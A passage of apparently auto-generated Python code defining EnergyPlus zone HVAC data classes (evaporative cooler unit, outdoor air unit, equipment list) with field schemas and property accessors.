@heating_convergence_tolerance.setter
def heating_convergence_tolerance(self, value=0.001):
"""Corresponds to IDD field `Heating Convergence Tolerance`"""
self["Heating Convergence Tolerance"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacEvaporativeCoolerUnit(DataObject):
""" Corresponds to IDD object `ZoneHVAC:EvaporativeCoolerUnit`
Zone evaporative cooler. Forced-convection cooling-only unit with supply fan,
100% outdoor air supply. Optional relief exhaust node
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outdoor air inlet node name',
{'name': u'Outdoor Air Inlet Node Name',
'pyname': u'outdoor_air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'cooler outlet node name',
{'name': u'Cooler Outlet Node Name',
'pyname': u'cooler_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'zone relief air node name',
{'name': u'Zone Relief Air Node Name',
'pyname': u'zone_relief_air_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:ConstantVolume',
u'Fan:OnOff',
u'Fan:VariableVolume',
u'Fan:ComponentModel'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design supply air flow rate',
{'name': u'Design Supply Air Flow Rate',
'pyname': u'design_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'fan placement',
{'name': u'Fan Placement',
'pyname': u'fan_placement',
'required-field': True,
'autosizable': False,
'accepted-values': [u'BlowThrough',
u'DrawThrough'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooler unit control method',
{'name': u'Cooler Unit Control Method',
'pyname': u'cooler_unit_control_method',
'required-field': True,
'autosizable': False,
'accepted-values': [u'ZoneTemperatureDeadbandOnOffCycling',
u'ZoneCoolingLoadOnOffCycling',
u'ZoneCoolingLoadVariableSpeedFan'],
'autocalculatable': False,
'type': 'alpha'}),
(u'throttling range temperature difference',
{'name': u'Throttling Range Temperature Difference',
'pyname': u'throttling_range_temperature_difference',
'default': 1.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'deltaC'}),
(u'cooling load control threshold heat transfer rate',
{'name': u'Cooling Load Control Threshold Heat Transfer Rate',
'pyname': u'cooling_load_control_threshold_heat_transfer_rate',
'default': 100.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'first evaporative cooler object type',
{'name': u'First Evaporative Cooler Object Type',
'pyname': u'first_evaporative_cooler_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'EvaporativeCooler:Direct:CelDekPad',
u'EvaporativeCooler:Direct:ResearchSpecial',
u'EvaporativeCooler:Indirect:CelDekPad',
u'EvaporativeCooler:Indirect:WetCoil',
u'EvaporativeCooler:Indirect:ResearchSpecial'],
'autocalculatable': False,
'type': 'alpha'}),
(u'first evaporative cooler object name',
{'name': u'First Evaporative Cooler Object Name',
'pyname': u'first_evaporative_cooler_object_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'second evaporative cooler object type',
{'name': u'Second Evaporative Cooler Object Type',
'pyname': u'second_evaporative_cooler_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'EvaporativeCooler:Direct:CelDekPad',
u'EvaporativeCooler:Direct:ResearchSpecial',
u'EvaporativeCooler:Indirect:CelDekPad',
u'EvaporativeCooler:Indirect:WetCoil',
u'EvaporativeCooler:Indirect:ResearchSpecial'],
'autocalculatable': False,
'type': 'alpha'}),
(u'second evaporative cooler name',
{'name': u'Second Evaporative Cooler Name',
'pyname': u'second_evaporative_cooler_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 15,
'name': u'ZoneHVAC:EvaporativeCoolerUnit',
'pyname': u'ZoneHvacEvaporativeCoolerUnit',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def outdoor_air_inlet_node_name(self):
"""field `Outdoor Air Inlet Node Name`
| this is an outdoor air node
Args:
value (str): value for IDD Field `Outdoor Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_inlet_node_name` or None if not set
"""
return self["Outdoor Air Inlet Node Name"]
@outdoor_air_inlet_node_name.setter
def outdoor_air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Inlet Node Name`"""
self["Outdoor Air Inlet Node Name"] = value
@property
def cooler_outlet_node_name(self):
"""field `Cooler Outlet Node Name`
| this is a zone inlet node
Args:
value (str): value for IDD Field `Cooler Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooler_outlet_node_name` or None if not set
"""
return self["Cooler Outlet Node Name"]
@cooler_outlet_node_name.setter
def cooler_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Cooler Outlet Node Name`"""
self["Cooler Outlet Node Name"] = value
@property
def zone_relief_air_node_name(self):
"""field `Zone Relief Air Node Name`
| this is a zone exhaust node, optional if flow is being balanced elsewhere
Args:
value (str): value for IDD Field `Zone Relief Air Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_relief_air_node_name` or None if not set
"""
return self["Zone Relief Air Node Name"]
@zone_relief_air_node_name.setter
def zone_relief_air_node_name(self, value=None):
"""Corresponds to IDD field `Zone Relief Air Node Name`"""
self["Zone Relief Air Node Name"] = value
@property
def supply_air_fan_object_type(self):
"""field `Supply Air Fan Object Type`
Args:
value (str): value for IDD Field `Supply Air Fan Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_type` or None if not set
"""
return self["Supply Air Fan Object Type"]
@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Object Type`"""
self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
"""field `Supply Air Fan Name`
Args:
value (str): value for IDD Field `Supply Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_name` or None if not set
"""
return self["Supply Air Fan Name"]
@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Name`"""
self["Supply Air Fan Name"] = value
@property
def design_supply_air_flow_rate(self):
"""field `Design Supply Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Design Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `design_supply_air_flow_rate` or None if not set
"""
return self["Design Supply Air Flow Rate"]
@design_supply_air_flow_rate.setter
def design_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Design Supply Air Flow Rate`"""
self["Design Supply Air Flow Rate"] = value
@property
def fan_placement(self):
"""field `Fan Placement`
Args:
value (str): value for IDD Field `Fan Placement`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `fan_placement` or None if not set
"""
return self["Fan Placement"]
@fan_placement.setter
def fan_placement(self, value=None):
"""Corresponds to IDD field `Fan Placement`"""
self["Fan Placement"] = value
@property
def cooler_unit_control_method(self):
"""field `Cooler Unit Control Method`
Args:
value (str): value for IDD Field `Cooler Unit Control Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooler_unit_control_method` or None if not set
"""
return self["Cooler Unit Control Method"]
@cooler_unit_control_method.setter
def cooler_unit_control_method(self, value=None):
"""Corresponds to IDD field `Cooler Unit Control Method`"""
self["Cooler Unit Control Method"] = value
@property
def throttling_range_temperature_difference(self):
"""field `Throttling Range Temperature Difference`
| used for ZoneTemperatureDeadbandOnOffCycling hystersis range for thermostatic control
| Units: deltaC
| Default value: 1.0
Args:
value (float): value for IDD Field `Throttling Range Temperature Difference`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `throttling_range_temperature_difference` or None if not set
"""
return self["Throttling Range Temperature Difference"]
@throttling_range_temperature_difference.setter
def throttling_range_temperature_difference(self, value=1.0):
"""Corresponds to IDD field `Throttling Range Temperature
Difference`"""
self["Throttling Range Temperature Difference"] = value
@property
def cooling_load_control_threshold_heat_transfer_rate(self):
"""field `Cooling Load Control Threshold Heat Transfer Rate`
| Sign convention is that positive values indicate a cooling load
| Units: W
| Default value: 100.0
Args:
value (float): value for IDD Field `Cooling Load Control Threshold Heat Transfer Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_load_control_threshold_heat_transfer_rate` or None if not set
"""
return self["Cooling Load Control Threshold Heat Transfer Rate"]
@cooling_load_control_threshold_heat_transfer_rate.setter
def cooling_load_control_threshold_heat_transfer_rate(self, value=100.0):
"""Corresponds to IDD field `Cooling Load Control Threshold Heat
Transfer Rate`"""
self["Cooling Load Control Threshold Heat Transfer Rate"] = value
@property
def first_evaporative_cooler_object_type(self):
"""field `First Evaporative Cooler Object Type`
Args:
value (str): value for IDD Field `First Evaporative Cooler Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `first_evaporative_cooler_object_type` or None if not set
"""
return self["First Evaporative Cooler Object Type"]
@first_evaporative_cooler_object_type.setter
def first_evaporative_cooler_object_type(self, value=None):
"""Corresponds to IDD field `First Evaporative Cooler Object Type`"""
self["First Evaporative Cooler Object Type"] = value
@property
def first_evaporative_cooler_object_name(self):
"""field `First Evaporative Cooler Object Name`
Args:
value (str): value for IDD Field `First Evaporative Cooler Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `first_evaporative_cooler_object_name` or None if not set
"""
return self["First Evaporative Cooler Object Name"]
@first_evaporative_cooler_object_name.setter
def first_evaporative_cooler_object_name(self, value=None):
"""Corresponds to IDD field `First Evaporative Cooler Object Name`"""
self["First Evaporative Cooler Object Name"] = value
@property
def second_evaporative_cooler_object_type(self):
"""field `Second Evaporative Cooler Object Type`
| optional, used for direct/indirect configurations
| second cooler must be immediately downstream of first cooler, if present
Args:
value (str): value for IDD Field `Second Evaporative Cooler Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `second_evaporative_cooler_object_type` or None if not set
"""
return self["Second Evaporative Cooler Object Type"]
@second_evaporative_cooler_object_type.setter
def second_evaporative_cooler_object_type(self, value=None):
"""Corresponds to IDD field `Second Evaporative Cooler Object Type`"""
self["Second Evaporative Cooler Object Type"] = value
@property
def second_evaporative_cooler_name(self):
"""field `Second Evaporative Cooler Name`
| optional, used for direct/indirect configurations
Args:
value (str): value for IDD Field `Second Evaporative Cooler Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `second_evaporative_cooler_name` or None if not set
"""
return self["Second Evaporative Cooler Name"]
@second_evaporative_cooler_name.setter
def second_evaporative_cooler_name(self, value=None):
"""Corresponds to IDD field `Second Evaporative Cooler Name`"""
self["Second Evaporative Cooler Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacOutdoorAirUnit(DataObject):
""" Corresponds to IDD object `ZoneHVAC:OutdoorAirUnit`
The zone outdoor air unit models a single-zone dedicated outdoor air system (DOAS).
Forced-convection 100% outdoor air unit with supply fan and optional equipment
including exhaust fan, heating coil, cooling coil, and heat recovery.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'zone name',
{'name': u'Zone Name',
'pyname': u'zone_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outdoor air flow rate',
{'name': u'Outdoor Air Flow Rate',
'pyname': u'outdoor_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'outdoor air schedule name',
{'name': u'Outdoor Air Schedule Name',
'pyname': u'outdoor_air_schedule_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply fan name',
{'name': u'Supply Fan Name',
'pyname': u'supply_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply fan placement',
{'name': u'Supply Fan Placement',
'pyname': u'supply_fan_placement',
'default': u'DrawThrough',
'required-field': True,
'autosizable': False,
'accepted-values': [u'BlowThrough',
u'DrawThrough'],
'autocalculatable': False,
'type': 'alpha'}),
(u'exhaust fan name',
{'name': u'Exhaust Fan Name',
'pyname': u'exhaust_fan_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'exhaust air flow rate',
{'name': u'Exhaust Air Flow Rate',
'pyname': u'exhaust_air_flow_rate',
'required-field': False,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'exhaust air schedule name',
{'name': u'Exhaust Air Schedule Name',
'pyname': u'exhaust_air_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'unit control type',
{'name': u'Unit Control Type',
'pyname': u'unit_control_type',
'default': u'NeutralControl',
'required-field': True,
'autosizable': False,
'accepted-values': [u'NeutralControl',
u'TemperatureControl'],
'autocalculatable': False,
'type': 'alpha'}),
(u'high air control temperature schedule name',
{'name': u'High Air Control Temperature Schedule Name',
'pyname': u'high_air_control_temperature_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'low air control temperature schedule name',
{'name': u'Low Air Control Temperature Schedule Name',
'pyname': u'low_air_control_temperature_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outdoor air node name',
{'name': u'Outdoor Air Node Name',
'pyname': u'outdoor_air_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'airoutlet node name',
{'name': u'AirOutlet Node Name',
'pyname': u'airoutlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'airinlet node name',
{'name': u'AirInlet Node Name',
'pyname': u'airinlet_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'supply fanoutlet node name',
{'name': u'Supply FanOutlet Node Name',
'pyname': u'supply_fanoutlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air unit list name',
{'name': u'Outdoor Air Unit List Name',
'pyname': u'outdoor_air_unit_list_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 18,
'name': u'ZoneHVAC:OutdoorAirUnit',
'pyname': u'ZoneHvacOutdoorAirUnit',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def zone_name(self):
"""field `Zone Name`
| (name of zone system is serving)
Args:
value (str): value for IDD Field `Zone Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_name` or None if not set
"""
return self["Zone Name"]
@zone_name.setter
def zone_name(self, value=None):
"""Corresponds to IDD field `Zone Name`"""
self["Zone Name"] = value
@property
def outdoor_air_flow_rate(self):
"""field `Outdoor Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `outdoor_air_flow_rate` or None if not set
"""
return self["Outdoor Air Flow Rate"]
@outdoor_air_flow_rate.setter
def outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Outdoor Air Flow Rate`"""
self["Outdoor Air Flow Rate"] = value
@property
def outdoor_air_schedule_name(self):
"""field `Outdoor Air Schedule Name`
Args:
value (str): value for IDD Field `Outdoor Air Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_schedule_name` or None if not set
"""
return self["Outdoor Air Schedule Name"]
@outdoor_air_schedule_name.setter
def outdoor_air_schedule_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Schedule Name`"""
self["Outdoor Air Schedule Name"] = value
@property
def supply_fan_name(self):
"""field `Supply Fan Name`
| Allowable fan types are Fan:ConstantVolume and
| Fan:VariableVolume
Args:
value (str): value for IDD Field `Supply Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_fan_name` or None if not set
"""
return self["Supply Fan Name"]
@supply_fan_name.setter
def supply_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Fan Name`"""
self["Supply Fan Name"] = value
@property
def supply_fan_placement(self):
"""field `Supply Fan Placement`
| Default value: DrawThrough
Args:
value (str): value for IDD Field `Supply Fan Placement`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_fan_placement` or None if not set
"""
return self["Supply Fan Placement"]
@supply_fan_placement.setter
def supply_fan_placement(self, value="DrawThrough"):
"""Corresponds to IDD field `Supply Fan Placement`"""
self["Supply Fan Placement"] = value
@property
def exhaust_fan_name(self):
"""field `Exhaust Fan Name`
| Allowable fan types are Fan:ConstantVolume and
| Fan:VariableVolume
Args:
value (str): value for IDD Field `Exhaust Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `exhaust_fan_name` or None if not set
"""
return self["Exhaust Fan Name"]
@exhaust_fan_name.setter
def exhaust_fan_name(self, value=None):
"""Corresponds to IDD field `Exhaust Fan Name`"""
self["Exhaust Fan Name"] = value
@property
def exhaust_air_flow_rate(self):
"""field `Exhaust Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Exhaust Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `exhaust_air_flow_rate` or None if not set
"""
return self["Exhaust Air Flow Rate"]
@exhaust_air_flow_rate.setter
def exhaust_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Exhaust Air Flow Rate`"""
self["Exhaust Air Flow Rate"] = value
@property
def exhaust_air_schedule_name(self):
"""field `Exhaust Air Schedule Name`
Args:
value (str): value for IDD Field `Exhaust Air Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `exhaust_air_schedule_name` or None if not set
"""
return self["Exhaust Air Schedule Name"]
@exhaust_air_schedule_name.setter
def exhaust_air_schedule_name(self, value=None):
"""Corresponds to IDD field `Exhaust Air Schedule Name`"""
self["Exhaust Air Schedule Name"] = value
@property
def unit_control_type(self):
"""field `Unit Control Type`
| Default value: NeutralControl
Args:
value (str): value for IDD Field `Unit Control Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `unit_control_type` or None if not set
"""
return self["Unit Control Type"]
@unit_control_type.setter
def unit_control_type(self, value="NeutralControl"):
"""Corresponds to IDD field `Unit Control Type`"""
self["Unit Control Type"] = value
@property
def high_air_control_temperature_schedule_name(self):
"""field `High Air Control Temperature Schedule Name`
| Air and control temperatures for cooling. If outdoor air temperature
| is above the high air control temperature, then the zone inlet air temperature
| is set to the high air control temperature. If the outdoor air is between high and low
| air control temperature, then there is no cooling/heating requirements.
Args:
value (str): value for IDD Field `High Air Control Temperature Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `high_air_control_temperature_schedule_name` or None if not set
"""
return self["High Air Control Temperature Schedule Name"]
@high_air_control_temperature_schedule_name.setter
def high_air_control_temperature_schedule_name(self, value=None):
"""Corresponds to IDD field `High Air Control Temperature Schedule
Name`"""
self["High Air Control Temperature Schedule Name"] = value
@property
def low_air_control_temperature_schedule_name(self):
"""field `Low Air Control Temperature Schedule Name`
| Air and control temperatures for Heating. If outdoor air temperature
| is below the low air control temperature, then the zone inlet air temperature
| is set to the low air control temperature. If the outdoor air is between high and low
| air control temperature, then there is no cooling/heating requirements.
Args:
value (str): value for IDD Field `Low Air Control Temperature Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `low_air_control_temperature_schedule_name` or None if not set
"""
return self["Low Air Control Temperature Schedule Name"]
@low_air_control_temperature_schedule_name.setter
def low_air_control_temperature_schedule_name(self, value=None):
"""Corresponds to IDD field `Low Air Control Temperature Schedule
Name`"""
self["Low Air Control Temperature Schedule Name"] = value
@property
def outdoor_air_node_name(self):
"""field `Outdoor Air Node Name`
Args:
value (str): value for IDD Field `Outdoor Air Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_node_name` or None if not set
"""
return self["Outdoor Air Node Name"]
@outdoor_air_node_name.setter
def outdoor_air_node_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Node Name`"""
self["Outdoor Air Node Name"] = value
@property
def airoutlet_node_name(self):
"""field `AirOutlet Node Name`
Args:
value (str): value for IDD Field `AirOutlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `airoutlet_node_name` or None if not set
"""
return self["AirOutlet Node Name"]
@airoutlet_node_name.setter
def airoutlet_node_name(self, value=None):
"""Corresponds to IDD field `AirOutlet Node Name`"""
self["AirOutlet Node Name"] = value
@property
def airinlet_node_name(self):
"""field `AirInlet Node Name`
| air leaves zone
Args:
value (str): value for IDD Field `AirInlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `airinlet_node_name` or None if not set
"""
return self["AirInlet Node Name"]
@airinlet_node_name.setter
def airinlet_node_name(self, value=None):
"""Corresponds to IDD field `AirInlet Node Name`"""
self["AirInlet Node Name"] = value
@property
def supply_fanoutlet_node_name(self):
"""field `Supply FanOutlet Node Name`
Args:
value (str): value for IDD Field `Supply FanOutlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_fanoutlet_node_name` or None if not set
"""
return self["Supply FanOutlet Node Name"]
@supply_fanoutlet_node_name.setter
def supply_fanoutlet_node_name(self, value=None):
"""Corresponds to IDD field `Supply FanOutlet Node Name`"""
self["Supply FanOutlet Node Name"] = value
@property
def outdoor_air_unit_list_name(self):
"""field `Outdoor Air Unit List Name`
| Enter the name of an ZoneHVAC:OutdoorAirUnit:EquipmentList object.
Args:
value (str): value for IDD Field `Outdoor Air Unit List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_unit_list_name` or None if not set
"""
return self["Outdoor Air Unit List Name"]
@outdoor_air_unit_list_name.setter
def outdoor_air_unit_list_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Unit List Name`"""
self["Outdoor Air Unit List Name"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
class ZoneHvacOutdoorAirUnitEquipmentList(DataObject):
""" Corresponds to IDD object `ZoneHVAC:OutdoorAirUnit:EquipmentList`
Equipment list for components in a ZoneHVAC:OutdoorAirUnit. Components are simulated
sequentially in the order given in the equipment list.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'component 1 object type',
{'name': u'Component 1 Object Type',
'pyname': u'component_1_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 1 name',
{'name': u'Component 1 Name',
'pyname': u'component_1_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 2 object type',
{'name': u'Component 2 Object Type',
'pyname': u'component_2_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 2 name',
